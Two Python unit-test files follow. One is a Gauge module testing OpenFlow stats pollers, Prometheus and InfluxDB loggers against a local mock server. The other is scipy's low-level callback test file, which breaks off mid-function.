""" port = parser.OFPPort(port_num, '00:00:00:d0:00:0'+ str(port_num), datapath.ports[port_num].name, 0, status, random.randint(1, 10000), random.randint(1, 10000), random.randint(1, 10000), random.randint(1, 10000), random.randint(1, 10000), random.randint(1, 10000) ) return parser.OFPPortStatus(datapath, reason, port) def port_stats_msg(datapath): """ Create an OFPPortStatsReply with random values. """ stats = [] sec = random.randint(1, 10000) nsec = random.randint(0, 10000) for port_num in datapath.ports: port_stats = parser.OFPPortStats(port_num, random.randint(1, 10000), random.randint(1, 10000), random.randint(1, 10000), random.randint(1, 10000), random.randint(0, 10000), random.randint(0, 10000), random.randint(0, 10000), random.randint(0, 10000), random.randint(0, 10000), random.randint(0, 10000), random.randint(0, 10000), random.randint(0, 10000), sec, nsec ) stats.append(port_stats) return parser.OFPPortStatsReply(datapath, body=stats) def flow_stats_msg(datapath, instructions): """ Create an OFPFlowStatsReply with random values. """ matches = generate_all_matches() flow_stats = parser.OFPFlowStats(random.randint(0, 9), random.randint(1, 10000), random.randint(0, 10000), random.randint(1, 10000), random.randint(1, 10000), random.randint(1, 10000), 0, random.randint(1, 10000), random.randint(1, 10000), random.randint(1, 10000), matches, instructions ) return parser.OFPFlowStatsReply(datapath, body=[flow_stats]) def generate_all_matches(): """ Generate all OpenFlow Extensible Matches (oxm) and return a single OFPMatch with all of these oxms. The value for each oxm is the largest value possible for the data type. For example, the largest number for a 4 bit int is 15. 
""" matches = dict() for oxm_type in ofproto.oxm_types: if oxm_type.type == type_desc.MacAddr: value = 'ff:ff:ff:ff:ff:ff' elif oxm_type.type == type_desc.IPv4Addr: value = '255.255.255.255' elif oxm_type.type == type_desc.IPv6Addr: value = 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff' elif isinstance(oxm_type.type, type_desc.IntDescr): value = 2**oxm_type.type.size - 1 else: continue matches[oxm_type.name] = value return parser.OFPMatch(**matches) def logger_to_ofp(port_stats): """ Translates between the logger stat name and the OpenFlow stat name""" return {'packets_out': port_stats.tx_packets, 'packets_in': port_stats.rx_packets, 'bytes_out': port_stats.tx_bytes, 'bytes_in': port_stats.rx_bytes, 'dropped_out': port_stats.tx_dropped, 'dropped_in': port_stats.rx_dropped, 'errors_out': port_stats.tx_errors, 'errors_in': port_stats.rx_errors } def get_matches(match_dict): """Create a set of match name and value tuples""" return {(entry['OXMTlv']['field'], entry['OXMTlv']['value']) for entry in match_dict} def check_instructions(original_inst, logger_inst, test): """ Check that the original instructions matches the instructions from the logger """ for inst_type, inst in logger_inst[0].items(): test.assertEqual(original_inst[0].__class__.__name__, inst_type) for attr_name, attr_val in inst.items(): original_val = getattr(original_inst[0], attr_name) test.assertEqual(original_val, attr_val) def compare_flow_msg(flow_msg, flow_dict, test): """ Compare the body section of an OFPFlowStatsReply message to a dict representation of it """ for stat_name, stat_val in flow_dict.items(): if stat_name == 'match': match_set = get_matches(stat_val['OFPMatch']['oxm_fields']) test.assertEqual(match_set, set(flow_msg.body[0].match.items())) elif stat_name == 'instructions': check_instructions(flow_msg.body[0].instructions, stat_val, test) else: test.assertEqual(getattr(flow_msg.body[0], stat_name), stat_val) class PretendInflux(QuietHandler): """An HTTP Handler that receives InfluxDB 
messages.""" def do_POST(self): # pylint: disable=invalid-name """ Write request contents to the HTTP server, if there is an output file to write to. """ if hasattr(self.server, 'output_file'): content_length = int(self.headers['content-length']) data = self.rfile.read(content_length) data = data.decode('utf-8') with open(self.server.output_file, 'w') as log: log.write(data) self.send_response(204) self.end_headers() class GaugePrometheusTests(unittest.TestCase): # pytype: disable=module-attr """Tests the GaugePortStatsPrometheusPoller update method""" prom_client = gauge_prom.GaugePrometheusClient(reg=CollectorRegistry()) def parse_prom_output(self, output): """Parses the port stats from prometheus into a dictionary""" parsed_output = {} for line in output.split('\n'): # discard comments and stats not related to port stats if line.startswith('#') or not line.startswith(gauge_prom.PROM_PORT_PREFIX): continue index = line.find('{') #get the stat name e.g. of_port_rx_bytes and strip 'of_port_' prefix = gauge_prom.PROM_PORT_PREFIX + gauge_prom.PROM_PREFIX_DELIM stat_name = line[0:index].replace(prefix, '') #get the labels within {} labels = line[index + 1:line.find('}')].split(',') for label in labels: lab_name, lab_val = label.split('=', 1) lab_val = lab_val.replace('"', '') if lab_name == 'dp_id': dp_id = int(lab_val, 16) elif lab_name == 'port': port_name = lab_val key = (dp_id, port_name) stat_val = line.split(' ')[-1] if key not in parsed_output: parsed_output[key] = [] parsed_output[key].append((stat_name, float(stat_val))) return parsed_output def get_prometheus_stats(self, addr, port): """Attempts to contact the prometheus server at the address to grab port stats.""" url = 'http://{}:{}'.format(addr, port) session = requests.Session() adapter = requests.adapters.HTTPAdapter(max_retries=10) session.mount('http://', adapter) return session.get(url).text def test_poller(self): """Test the update method to see if it pushes port stats""" datapath = 
create_mock_datapath(2) conf = mock.Mock(dp=datapath, type='', interval=1, prometheus_port=9303, prometheus_addr='localhost', use_test_thread=True ) prom_poller = gauge_prom.GaugePortStatsPrometheusPoller(conf, '__name__', self.prom_client) prom_poller._running = True msg = port_stats_msg(datapath) prom_poller.update(time.time(), msg) prom_lines = self.get_prometheus_stats(conf.prometheus_addr, conf.prometheus_port) prom_lines = self.parse_prom_output(prom_lines) for port_num, port in datapath.ports.items(): port_stats = msg.body[int(port_num) - 1] stats = prom_lines[(datapath.dp_id, port.name)] stats_found = set() for stat_name, stat_val in stats: self.assertAlmostEqual(stat_val, getattr(port_stats, stat_name)) stats_found.add(stat_name) self.assertEqual(stats_found, set(gauge_prom.PROM_PORT_VARS)) def test_port_state(self): """Test the update method to see if it pushes port state""" datapath = create_mock_datapath(2) conf = mock.Mock(dp=datapath, type='', interval=1, prometheus_port=9303, prometheus_addr='localhost', use_test_thread=True ) prom_poller = gauge_prom.GaugePortStatePrometheusPoller(conf, '__name__', self.prom_client) prom_poller._running = True reasons = [ofproto.OFPPR_ADD, ofproto.OFPPR_DELETE, ofproto.OFPPR_MODIFY] for i in range(1, len(conf.dp.ports) + 1): msg = port_state_msg(conf.dp, i, reasons[i-1]) port_name = conf.dp.ports[i].name rcv_time = int(time.time()) prom_poller.update(rcv_time, msg) prom_lines = self.get_prometheus_stats(conf.prometheus_addr, conf.prometheus_port) prom_lines = self.parse_prom_output(prom_lines) stats = prom_lines[(datapath.dp_id, port_name)] stats_found = set() for stat_name, stat_val in stats: msg_data = msg if stat_name == 'reason' else msg.desc self.assertAlmostEqual(stat_val, getattr(msg_data, stat_name)) stats_found.add(stat_name) self.assertEqual(stats_found, set(gauge_prom.PROM_PORT_STATE_VARS)) def test_flow_stats(self): """Check the update method of the GaugeFlowTablePrometheusPoller class""" datapath = 
create_mock_datapath(2) conf = mock.Mock(dp=datapath, type='', interval=1, prometheus_port=9303, prometheus_addr='localhost', use_test_thread=True ) prom_poller = gauge_prom.GaugeFlowTablePrometheusPoller(conf, '__name__', self.prom_client) rcv_time = int(time.time()) instructions = [parser.OFPInstructionGotoTable(1)] msg = flow_stats_msg(conf.dp, instructions) prom_poller.update(rcv_time, msg) class GaugeInfluxShipperTest(unittest.TestCase): # pytype: disable=module-attr """Tests the InfluxShipper""" def create_config_obj(self, port=12345): """Create a mock config object that contains the necessary InfluxDB config""" conf = mock.Mock(influx_host='localhost', influx_port=port, influx_user='gauge', influx_pwd='', influx_db='gauge', influx_timeout=10 ) return conf def get_values(self, dict_to_unpack): """Get all the values from a nested dictionary""" values = [] for value in dict_to_unpack.values(): if isinstance(value, dict): values.extend(self.get_values(value)) else: values.append(value) return values def test_ship_success(self): """Checks that the shipper successsfully connects to a HTTP server when the points are shipped""" try: server = start_server(PretendInflux) shipper = gauge_influx.InfluxShipper() shipper.conf = self.create_config_obj(server.server_port) points = [{'measurement': 'test_stat_name', 'fields' : {'value':1}},] shipper.ship_points(points) except (ConnectionError, ReadTimeout) as err: self.fail("Code threw an exception: {}".format(err)) finally: server.socket.close() server.shutdown() def test_ship_connection_err(self): """Checks that even when there is a connection error, there is no exception thrown""" try: shipper = gauge_influx.InfluxShipper() shipper.conf = self.create_config_obj() shipper.logger = mock.Mock() points = [{'measurement': 'test_stat_name', 'fields' : {'value':1}},] shipper.ship_points(points) except (ConnectionError, ReadTimeout) as err: self.fail("Code threw an exception: {}".format(err)) def test_ship_no_config(self): 
"""Check that no exceptions are thrown when there is no config""" try: shipper = gauge_influx.InfluxShipper() points = [{'measurement': 'test_stat_name', 'fields' : {'value':1}},] shipper.ship_points(points) except (ConnectionError, ReadTimeout) as err: self.fail("Code threw an exception: {}".format(err)) def test_point(self): """Checks that the points produced still have the variables given to it""" shipper = gauge_influx.InfluxShipper() dp_name = 'faucet-1' port_name = 'port1.0.1' rcv_time = int(time.time()) stat_name = 'test_stat_name' #max uint64 number stat_val = 2**64 - 1 port_point = shipper.make_port_point(dp_name, port_name, rcv_time, stat_name, stat_val) values = {dp_name, port_name, rcv_time, stat_name} port_vals = set(self.get_values(port_point)) port_vals_stat = port_vals.difference(values) self.assertEqual(len(port_vals_stat), 1) self.assertAlmostEqual(port_vals_stat.pop(), stat_val) tags = {'dp_name': dp_name, 'port_name': port_name} point = shipper.make_point(tags, rcv_time, stat_name, stat_val) point_vals = set(self.get_values(point)) point_vals_stat = point_vals.difference(values) self.assertEqual(len(point_vals_stat), 1) self.assertAlmostEqual(point_vals_stat.pop(), stat_val) class GaugeInfluxUpdateTest(unittest.TestCase): # pytype: disable=module-attr """Test the Influx loggers update methods""" server = None def setUp(self): """ Starts up an HTTP server to mock InfluxDB. 
        Also opens a new temp file for the server to write to """

        self.server = start_server(PretendInflux)
        self.temp_fd, self.server.output_file = tempfile.mkstemp()

    def tearDown(self):
        """ Close the temp file (which should delete it)
        and stop the HTTP server """

        os.close(self.temp_fd)
        os.remove(self.server.output_file)
        self.server.socket.close()
        self.server.shutdown()

    def create_config_obj(self, datapath):
        """Create a mock config object that contains the necessary InfluxDB config"""
        conf = mock.Mock(influx_host='localhost',
                         influx_port=self.server.server_port,
                         influx_user='gauge',
                         influx_pwd='',
                         influx_db='gauge',
                         influx_timeout=10,
                         interval=5,
                         dp=datapath
                         )
        return conf

    @staticmethod
    def parse_key_value(dictionary, kv_list):
        """
        When given a list consisting of strings such as: 'key1=val1',
        add to the dictionary as dictionary['key1'] = 'val1'.
        Ignore entries in the list which do not contain '='
        """
        for key_val in kv_list:
            if '=' in key_val:
                key, val = key_val.split('=')

                try:
                    val = float(val)
                    # NOTE(review): int(float) truncates, so a non-integral
                    # float value would lose its fraction here — presumably
                    # all numeric values in this output are integral; confirm.
                    val = int(val)
                except ValueError:
                    pass

                dictionary[key] = val

    def parse_influx_output(self, output_to_parse):
        """
        Parse the output from the mock InfluxDB server
        The usual layout of the output is:
        measurement,tag1=val1,tag2=val2 field1=val3 timestamp
        The tags are separated with a comma and the fields are
        separated with a space. The measurement always appears first,
        and the timestamp is always last
        """
        influx_data = dict()

        tags = output_to_parse.split(',')
        fields = tags[-1].split(' ')
        # The last 'tag' still carries the first field; split it off.
        tags[-1] = fields[0]
        influx_data['timestamp'] = int(fields[-1])
        fields = fields[1:-1]

        self.parse_key_value(influx_data, tags)
        self.parse_key_value(influx_data, fields)
        return (tags[0], influx_data)

    def test_port_state(self):
        """ Check the update method of the GaugePortStateInfluxDBLogger class"""
        conf = self.create_config_obj(create_mock_datapath(3))
        db_logger = gauge_influx.GaugePortStateInfluxDBLogger(conf, '__name__', mock.Mock())
        db_logger._running = True

        reasons = [ofproto.OFPPR_ADD, ofproto.OFPPR_DELETE, ofproto.OFPPR_MODIFY]
        for i in range(1, len(conf.dp.ports) + 1):
            msg = port_state_msg(conf.dp, i, reasons[i-1])
            rcv_time = int(time.time())
            db_logger.update(rcv_time, msg)

            with open(self.server.output_file, 'r') as log:
                output = log.read()

            influx_data = self.parse_influx_output(output)[1]
            data = {conf.dp.name, conf.dp.ports[i].name, rcv_time, reasons[i-1]}
            self.assertEqual(data, set(influx_data.values()))

    def test_port_stats(self):
        """Check the update method of the GaugePortStatsInfluxDBLogger class"""
        conf = self.create_config_obj(create_mock_datapath(2))
        db_logger = gauge_influx.GaugePortStatsInfluxDBLogger(conf, '__name__', mock.Mock())
        db_logger._running = True

        msg = port_stats_msg(conf.dp)
        rcv_time = int(time.time())
        db_logger.update(rcv_time, msg)

        with open(self.server.output_file, 'r') as log:
            output = log.readlines()

        for line in output:
            measurement, influx_data = self.parse_influx_output(line)

            # get the number at the end of the port_name
            port_num = influx_data['port_name']  # pytype: disable=unsupported-operands
            # get the original port stat value
            port_stat_val = logger_to_ofp(
                msg.body[port_num - 1])[measurement]  # pytype: disable=unsupported-operands

            self.assertEqual(port_stat_val, influx_data['value'])
            self.assertEqual(conf.dp.name, influx_data['dp_name'])
            self.assertEqual(rcv_time, influx_data['timestamp'])

    def test_flow_stats(self):
        """Check the update method of the GaugeFlowTableInfluxDBLogger class"""
        conf = self.create_config_obj(create_mock_datapath(0))
        db_logger = gauge_influx.GaugeFlowTableInfluxDBLogger(conf, '__name__', mock.Mock())
        db_logger._running = True

        rcv_time = int(time.time())
        instructions = [parser.OFPInstructionGotoTable(1)]
        msg = flow_stats_msg(conf.dp, instructions)
        db_logger.update(rcv_time, msg)

        other_fields = {'dp_name': conf.dp.name,
                        'dp_id': hex(conf.dp.dp_id),
                        'timestamp': rcv_time,
                        'priority': msg.body[0].priority,
                        'table_id': msg.body[0].table_id,
                        'inst_count': len(msg.body[0].instructions),
                        'vlan': msg.body[0].match.get('vlan_vid') ^ ofproto.OFPVID_PRESENT,
                        'cookie': msg.body[0].cookie,
                        }

        with open(self.server.output_file, 'r') as log:
            output = log.readlines()

        for line in output:
            measurement, influx_data = self.parse_influx_output(line)

            for stat_name, stat_val in influx_data.items():
                if stat_name == 'value':
                    if measurement == 'flow_packet_count':
                        self.assertEqual(msg.body[0].packet_count, stat_val)
                    elif measurement == 'flow_byte_count':
                        self.assertEqual(msg.body[0].byte_count, stat_val)
                    else:
                        self.fail("Unknown measurement")

                elif stat_name in other_fields:
                    self.assertEqual(other_fields[stat_name], stat_val)

                elif stat_name in msg.body[0].match:
                    self.assertEqual(msg.body[0].match.get(stat_name), stat_val)

                else:
                    self.fail("Unknown key: {} and value: {}".format(stat_name, stat_val))


class GaugeThreadPollerTest(unittest.TestCase):  # pytype: disable=module-attr
    """Tests the methods in the GaugeThreadPoller class"""

    def setUp(self):
        """Creates a gauge poller and initialises class variables"""
        self.interval = 1
        conf = mock.Mock(interval=self.interval)
        self.poller = gauge_pollers.GaugeThreadPoller(conf, '__name__', mock.Mock())
        self.send_called = False

    def fake_send_req(self):
        """This should be called instead of the send_req method in the
        GaugeThreadPoller class, which just throws an error"""
        self.send_called = True

    def
fake_no_response(self):
        """This should be called instead of the no_response method in the
        GaugeThreadPoller class, which just throws an error"""
        return

    def test_start(self):
        """ Checks if the poller is started """
        self.poller.send_req = self.fake_send_req
        self.poller.no_response = self.fake_no_response

        self.poller.start(mock.Mock(), active=True)
        poller_thread = self.poller.thread
        # Wait one interval so the poller has had a chance to fire.
        hub.sleep(self.interval + 1)
        self.assertTrue(self.send_called)
        self.assertFalse(poller_thread.dead)

    def test_stop(self):
        """ Check if a poller can be stopped """
        self.poller.send_req = self.fake_send_req
        self.poller.no_response = self.fake_no_response

        self.poller.start(mock.Mock(), active=True)
        poller_thread = self.poller.thread
        self.poller.stop()
        hub.sleep(self.interval + 1)

        # Stopped before the first interval elapsed: no request, thread dead.
        self.assertFalse(self.send_called)
        self.assertTrue(poller_thread.dead)

    def test_active(self):
        """Check if active reflects the state of the poller """
        self.assertFalse(self.poller.is_active())
        self.assertFalse(self.poller.running())
        self.poller.start(mock.Mock(), active=True)
        self.assertTrue(self.poller.is_active())
        self.assertTrue(self.poller.running())
        self.poller.stop()
        self.assertFalse(self.poller.is_active())
        self.assertFalse(self.poller.running())
        # A poller can run without being active.
        self.poller.start(mock.Mock(), active=False)
        self.assertFalse(self.poller.is_active())
        self.assertTrue(self.poller.running())
        self.poller.stop()
        self.assertFalse(self.poller.is_active())
        self.assertFalse(self.poller.running())


class GaugePollerTest(unittest.TestCase):  # pytype: disable=module-attr
    """Checks the send_req and no_response methods in a Gauge Poller"""

    def check_send_req(self, poller, msg_class):
        """Check that the message being sent matches the expected one"""
        datapath = mock.Mock(ofproto=ofproto, ofproto_parser=parser)
        poller.start(datapath, active=True)
        poller.stop()
        poller.send_req()

        for method_call in datapath.mock_calls:
            arg = method_call[1][0]
            self.assertTrue(isinstance(arg, msg_class))

    def check_no_response(self, poller):
        """Check that no exception occurs
        when the no_response method is called"""
        try:
            poller.no_response()
        except Exception as err:
            self.fail("Code threw an exception: {}".format(err))


class GaugePortStatsPollerTest(GaugePollerTest):
    """Checks the GaugePortStatsPoller class"""

    def test_send_req(self):
        """Check that the poller sends a port stats request"""
        conf = mock.Mock(interval=1)
        poller = gauge_pollers.GaugePortStatsPoller(conf, '__name__', mock.Mock())
        self.check_send_req(poller, parser.OFPPortStatsRequest)

    def test_no_response(self):
        """Check that the poller doesnt throw an exception"""
        poller = gauge_pollers.GaugePortStatsPoller(mock.Mock(), '__name__', mock.Mock())
        self.check_no_response(poller)


class GaugeFlowTablePollerTest(GaugePollerTest):
    """Checks the GaugeFlowTablePoller class"""

    def test_send_req(self):
        """Check that the poller sends a flow stats request"""
        conf = mock.Mock(interval=1)
        poller = gauge_pollers.GaugeFlowTablePoller(conf, '__name__', mock.Mock())
        self.check_send_req(poller, parser.OFPFlowStatsRequest)

    def test_no_response(self):
        """Check that the poller doesnt throw an exception"""
        poller = gauge_pollers.GaugeFlowTablePoller(mock.Mock(), '__name__', mock.Mock())
        self.check_no_response(poller)


class GaugeWatcherTest(unittest.TestCase):  # pytype: disable=module-attr
    """Checks the loggers in watcher.py."""

    conf = None
    temp_path = None
    tmp_filename = "tmp_filename"

    def setUp(self):
        """Creates a temporary file and directory and a mocked conf object"""
        self.temp_path = tempfile.mkdtemp()
        self.conf = mock.Mock(
            file=os.path.join(self.temp_path, self.tmp_filename),
            path=self.temp_path,
            compress=False
        )

    def tearDown(self):
        """Removes the temporary directory and its contents"""
        shutil.rmtree(self.temp_path)

    def get_file_contents(self, filename=tmp_filename):
        """Return the contents of the temporary file and clear it"""
        filename = os.path.join(self.temp_path, filename)
        with open(filename, 'r+') as file_:
            contents = file_.read()
            # Truncate so the next read only sees fresh output.
            file_.seek(0, 0)
            file_.truncate()

        return contents

    def test_port_state(self):
        """Check the update method in the GaugePortStateLogger class"""
        reasons = {'unknown': 5,
                   'add': ofproto.OFPPR_ADD,
                   'delete': ofproto.OFPPR_DELETE,
                   'up': ofproto.OFPPR_MODIFY,
                   'down': ofproto.OFPPR_MODIFY
                   }

        # add an ofproto attribute to the datapath
        datapath = create_mock_datapath(1)
        ofp_attr = {'ofproto': ofproto}
        datapath.configure_mock(**ofp_attr)
        self.conf.dp = datapath

        logger = watcher.GaugePortStateLogger(self.conf, '__name__', mock.Mock())
        logger._running = True

        for reason in reasons:
            state = 0
            if reason == 'down':
                state = ofproto.OFPPS_LINK_DOWN

            msg = port_state_msg(datapath, 1, reasons[reason], state)
            logger.update(time.time(), msg)

            log_str = self.get_file_contents().lower()
            self.assertTrue(reason in log_str)
            self.assertTrue(msg.desc.name in log_str or
                            'port ' + str(msg.desc.port_no) in log_str)

            hexs = re.findall(r'0x[0-9A-Fa-f]+', log_str)
            hexs = [int(num, 16) for num in hexs]
            self.assertTrue(datapath.dp_id in hexs or str(datapath.dp_id) in log_str)

    def test_port_stats(self):
        """Check the update method in the GaugePortStatsLogger class"""
        # add an ofproto attribute to the datapath
        datapath = create_mock_datapath(2)
        ofp_attr = {'ofproto': ofproto}
        datapath.configure_mock(**ofp_attr)

        # add the datapath as an attribute to the config
        dp_attr = {'dp': datapath}
        self.conf.configure_mock(**dp_attr)

        logger = watcher.GaugePortStatsLogger(self.conf, '__name__', mock.Mock())
        logger._running = True
        msg = port_stats_msg(datapath)

        original_stats = []
        for i in range(0, len(msg.body)):
            original_stats.append(logger_to_ofp(msg.body[i]))

        logger.update(time.time(), msg)
        log_str = self.get_file_contents()

        for stat_name in original_stats[0]:
            stat_name = stat_name.split("_")
            # grab any lines that mention the stat_name
            pattern = r'^.*{}.{}.*$'.format(stat_name[0], stat_name[1])
            stats_list = re.findall(pattern, log_str, re.MULTILINE)

            for line in stats_list:
                self.assertTrue(datapath.name in line)
                # grab the port number (only works for single digit port nums)
                index = line.find('port')
                port_num = int(line[index + 4])

                # grab the number at the end of the line
                last_n = re.search(r'(\d+)$', line)
                assert last_n
                val = int(last_n.group())

                logger_stat_name = '_'.join((stat_name[0], stat_name[1]))
                original_val = original_stats[port_num - 1][logger_stat_name]
                self.assertEqual(original_val, val)

    def test_flow_stats(self):
        """Check the update method in the GaugeFlowStatsLogger class"""
        # add an ofproto attribute to the datapath
        datapath = create_mock_datapath(0)
        ofp_attr = {'ofproto': ofproto}
        datapath.configure_mock(**ofp_attr)

        # add the datapath as an attribute to the config
        dp_attr = {'dp': datapath}
        self.conf.configure_mock(**dp_attr)

        logger = watcher.GaugeFlowTableLogger(self.conf, '__name__', mock.Mock())
        logger._running = True
        instructions = [parser.OFPInstructionGotoTable(1)]

        msg = flow_stats_msg(datapath, instructions)
        rcv_time = time.time()
        rcv_time_str = logger._rcv_time(rcv_time)
        logger.update(rcv_time, msg)
        log_str = self.get_file_contents(
            "{}--flowtable--{}.json".format(datapath.name, rcv_time_str)
        )

        yaml_dict = yaml.safe_load(log_str)['OFPFlowStatsReply']['body'][0]['OFPFlowStats']
        compare_flow_msg(msg, yaml_dict, self)


class RyuAppSmokeTest(unittest.TestCase):  # pytype: disable=module-attr
    """Test Gauge Ryu app."""

    def setUp(self):
        self.tmpdir = tempfile.mkdtemp()
        os.environ['GAUGE_LOG'] = os.path.join(self.tmpdir, 'gauge.log')
        os.environ['GAUGE_EXCEPTION_LOG'] = os.path.join(self.tmpdir, 'gauge-exception.log')
        self.ryu_app = None

    def tearDown(self):
        valve_util.close_logger(self.ryu_app.logger)
        valve_util.close_logger(self.ryu_app.exc_logger)
        shutil.rmtree(self.tmpdir)

    @staticmethod
    def _fake_dp():
        # Minimal datapath stand-in: an id and a no-op close().
        datapath = namedtuple('datapath', ['id', 'close'])(0, lambda: None)
        return datapath

    def _fake_event(self):
        datapath = self._fake_dp()
        msg = namedtuple('msg', ['datapath'])(datapath)
        event = EventOFPMsgBase(msg=msg)
        event.dp = msg.datapath
        return event

    def _write_config(self, config_file_name, config):
        with open(config_file_name, 'w') as config_file:
            config_file.write(config)

    def test_gauge(self):
        """Test Gauge can be initialized."""
        os.environ['GAUGE_CONFIG'] = '/dev/null'
        self.ryu_app = gauge.Gauge(
            dpset={},
            reg=CollectorRegistry())
        self.ryu_app.reload_config(None)
        self.assertFalse(self.ryu_app._config_files_changed())
        self.ryu_app._update_watcher(None, self._fake_event())
        self.ryu_app._start_watchers(self._fake_dp(), {}, time.time())

        for event_handler in (
                self.ryu_app._datapath_connect,
                self.ryu_app._datapath_disconnect):
            event_handler(self._fake_event())

    def test_gauge_config(self):
        """Test Gauge minimal config."""
        # NOTE(review): the internal line layout of these YAML literals was
        # lost in this copy of the file; reconstructed with conventional
        # indentation — confirm against upstream.
        faucet_conf1 = """
vlans:
   100:
       description: "100"
dps:
   dp1:
       dp_id: 0x1
       interfaces:
           1:
               description: "1"
               native_vlan: 100
"""
        faucet_conf2 = """
vlans:
   100:
       description: "200"
dps:
   dp1:
       dp_id: 0x1
       interfaces:
           2:
               description: "2"
               native_vlan: 100
"""
        os.environ['FAUCET_CONFIG'] = os.path.join(self.tmpdir, 'faucet.yaml')
        self._write_config(os.environ['FAUCET_CONFIG'], faucet_conf1)
        os.environ['GAUGE_CONFIG'] = os.path.join(self.tmpdir, 'gauge.yaml')
        gauge_conf = """
faucet_configs:
    - '%s'
watchers:
    port_status_poller:
        type: 'port_state'
        all_dps: True
        db: 'prometheus'
    port_stats_poller:
        type: 'port_stats'
        all_dps: True
        interval: 10
        db: 'prometheus'
    flow_table_poller:
        type: 'flow_table'
        all_dps: True
        interval: 60
        db: 'prometheus'
dbs:
    prometheus:
        type: 'prometheus'
        prometheus_addr: '0.0.0.0'
        prometheus_port: 0
""" % os.environ['FAUCET_CONFIG']
        self._write_config(os.environ['GAUGE_CONFIG'], gauge_conf)
        self.ryu_app = gauge.Gauge(
            dpset={},
            reg=CollectorRegistry())
        self.ryu_app.reload_config(None)
        self.assertFalse(self.ryu_app._config_files_changed())
        self.assertTrue(self.ryu_app.watchers)
        self.ryu_app.reload_config(None)
        self.assertTrue(self.ryu_app.watchers)
        self.assertFalse(self.ryu_app._config_files_changed())
        # Load a new FAUCET config.
        self._write_config(os.environ['FAUCET_CONFIG'], faucet_conf2)
        self.assertTrue(self.ryu_app._config_files_changed())
        self.ryu_app.reload_config(None)
        self.assertTrue(self.ryu_app.watchers)
        self.assertFalse(self.ryu_app._config_files_changed())
        # Load an invalid Gauge config
        self._write_config(os.environ['GAUGE_CONFIG'], 'invalid')
        self.assertTrue(self.ryu_app._config_files_changed())
        self.ryu_app.reload_config(None)
        self.assertTrue(self.ryu_app.watchers)
        # Keep trying to load a valid version.
        self.assertTrue(self.ryu_app._config_files_changed())
        # Load good Gauge config back
        self._write_config(os.environ['GAUGE_CONFIG'], gauge_conf)
        self.assertTrue(self.ryu_app._config_files_changed())
        self.ryu_app.reload_config(None)
        self.assertTrue(self.ryu_app.watchers)
        self.assertFalse(self.ryu_app._config_files_changed())


if __name__ == "__main__":
    unittest.main()  # pytype: disable=module-attr
test_ccallback.py
from __future__ import division, print_function, absolute_import

from numpy.testing import assert_equal, assert_raises, assert_
import time
import nose
import ctypes
import threading

from scipy._lib import _ccallback_c as _test_ccallback_cython
from scipy._lib import _test_ccallback
from scipy._lib._ccallback import LowLevelCallable

# cffi is optional; tests exercising the cffi code paths are skipped when it
# is not installed (see _get_cffi_func / _get_cffi_data below).
try:
    import cffi
    HAVE_CFFI = True
except ImportError:
    HAVE_CFFI = False


# Magic input value that every test callback treats as "raise an error".
ERROR_VALUE = 2.0


def callback_python(a, user_data=None):
    """Pure-Python reference callback: returns a+1 (or a+user_data).

    Raises ValueError when *a* equals ERROR_VALUE so callers can test
    error propagation through the C callback machinery.
    """
    if a == ERROR_VALUE:
        raise ValueError("bad value")

    if user_data is None:
        return a + 1
    else:
        return a + user_data

def _get_cffi_func(base, signature):
    """Re-wrap a ctypes function pointer as a cffi callable with *signature*."""
    if not HAVE_CFFI:
        raise nose.SkipTest("cffi not installed")

    # Get function address
    voidp = ctypes.cast(base, ctypes.c_void_p)
    address = voidp.value

    # Create corresponding cffi handle
    ffi = cffi.FFI()
    func = ffi.cast(signature, address)
    return func

def _get_ctypes_data():
    """Return a ctypes void* pointing at a double with value 2.0."""
    value = ctypes.c_double(2.0)
    return ctypes.cast(ctypes.pointer(value), ctypes.c_voidp)

def _get_cffi_data():
    """Return a cffi double* pointing at the value 2.0."""
    if not HAVE_CFFI:
        raise nose.SkipTest("cffi not installed")
    ffi = cffi.FFI()
    return ffi.new('double *', 2.0)

# Caller entry points: each invokes a LowLevelCallable through a different
# C-side calling mechanism.
CALLERS = {
    'simple': _test_ccallback.test_call_simple,
    'nodata': _test_ccallback.test_call_nodata,
    'nonlocal': _test_ccallback.test_call_nonlocal,
    'cython': _test_ccallback_cython.test_call_cython,
}

# These functions have signatures known to the callers
FUNCS = {
    'python': lambda: callback_python,
    'capsule': lambda: _test_ccallback.test_get_plus1_capsule(),
    'cython': lambda: LowLevelCallable.from_cython(_test_ccallback_cython,
                                                   "plus1_cython"),
    'ctypes': lambda: _test_ccallback_cython.plus1_ctypes,
    'cffi': lambda: _get_cffi_func(_test_ccallback_cython.plus1_ctypes,
                                   'double (*)(double, int *, void *)'),
    'capsule_b': lambda: _test_ccallback.test_get_plus1b_capsule(),
    'cython_b': lambda: LowLevelCallable.from_cython(_test_ccallback_cython,
                                                     "plus1b_cython"),
    'ctypes_b': lambda: _test_ccallback_cython.plus1b_ctypes,
    'cffi_b': lambda: _get_cffi_func(_test_ccallback_cython.plus1b_ctypes,
                                     'double (*)(double, double, int *, void *)'),
}

# These functions have signatures the callers don't know
BAD_FUNCS = {
    'capsule_bc': lambda: _test_ccallback.test_get_plus1bc_capsule(),
    'cython_bc': lambda: LowLevelCallable.from_cython(_test_ccallback_cython,
                                                      "plus1bc_cython"),
    'ctypes_bc': lambda: _test_ccallback_cython.plus1bc_ctypes,
    'cffi_bc': lambda: _get_cffi_func(_test_ccallback_cython.plus1bc_ctypes,
                                      'double (*)(double, double, double, int *, void *)'),
}

# Factories for the opaque user_data pointer passed alongside the callback.
USER_DATAS = {
    'ctypes': _get_ctypes_data,
    'cffi': _get_cffi_data,
    'capsule': _test_ccallback.test_get_data_capsule,
}


def test_callbacks():
    """Exercise every (caller, func, user_data) combination (nose generator)."""
    def check(caller, func, user_data):
        caller = CALLERS[caller]
        func = FUNCS[func]()
        user_data = USER_DATAS[user_data]()

        if func is callback_python:
            # Plain Python callback: bind user_data via a closure instead.
            func2 = lambda x: func(x, 2.0)
        else:
            func2 = LowLevelCallable(func, user_data)
            func = LowLevelCallable(func)

        # Test basic call
        assert_equal(caller(func, 1.0), 2.0)

        # Test 'bad' value resulting to an error
        assert_raises(ValueError, caller, func, ERROR_VALUE)

        # Test passing in user_data
        assert_equal(caller(func2, 1.0), 3.0)

    for caller in sorted(CALLERS.keys()):
        for func in sorted(FUNCS.keys()):
            for user_data in sorted(USER_DATAS.keys()):
                yield check, caller, func, user_data


def test_bad_callbacks():
    """Callbacks with signatures the callers don't know must raise ValueError."""
    def check(caller, func, user_data):
        caller = CALLERS[caller]
        user_data = USER_DATAS[user_data]()
        func = BAD_FUNCS[func]()

        if func is callback_python:
